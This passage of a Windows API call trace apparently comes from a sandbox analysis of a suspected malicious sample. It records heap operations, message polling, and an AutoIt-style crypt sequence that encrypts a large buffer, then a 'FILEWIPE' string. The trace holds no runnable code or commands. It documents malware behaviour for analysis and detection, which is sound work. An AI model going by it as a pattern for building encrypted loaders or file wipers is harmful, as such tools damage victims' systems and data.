(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.589] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.589] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0036.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0036.589] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3e8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3e8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.589] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.589] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.589] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.590] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.590] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.590] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0036.590] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.590] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.590] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.590] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.590] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.590] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.590] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.590] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.590] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.591] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.591] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.591] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.591] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0036.591] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.591] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.591] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x15d56, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x15d60) returned 1 [0036.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.592] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.592] CharLowerBuffW (in: lpsz="byte[89441]", cchLength=0xb | out: lpsz="byte[89441]") returned 0xb [0036.592] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.593] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.593] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.593] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.593] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.593] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a5d10*, pdwDataLen=0x6ae220*=0x15d56, dwBufLen=0x15d60 | out: pbData=0x8a5d10*, pdwDataLen=0x6ae220*=0x15d60) returned 1 [0036.594] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.594] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.595] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.595] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.595] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.595] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.595] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.595] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.595] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.595] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0036.595] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.595] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.595] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.596] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.596] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.596] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.596] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.596] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.601] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.601] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.601] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.601] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.605] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.605] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.605] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.605] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.605] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0036.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.605] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0036.605] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.605] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.605] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0036.605] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.605] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.606] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.606] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0036.606] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0036.606] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0036.606] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.606] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.606] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.606] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.606] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.606] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.606] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.606] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.606] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.606] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.607] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.607] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.607] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.607] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.607] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0036.607] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.607] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.607] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0036.607] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.607] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.607] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0036.607] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0036.607] FreeLibrary (hLibModule=0x754b0000) returned 1 [0036.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0036.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0036.608] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0036.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.608] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.608] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0036.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0036.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, 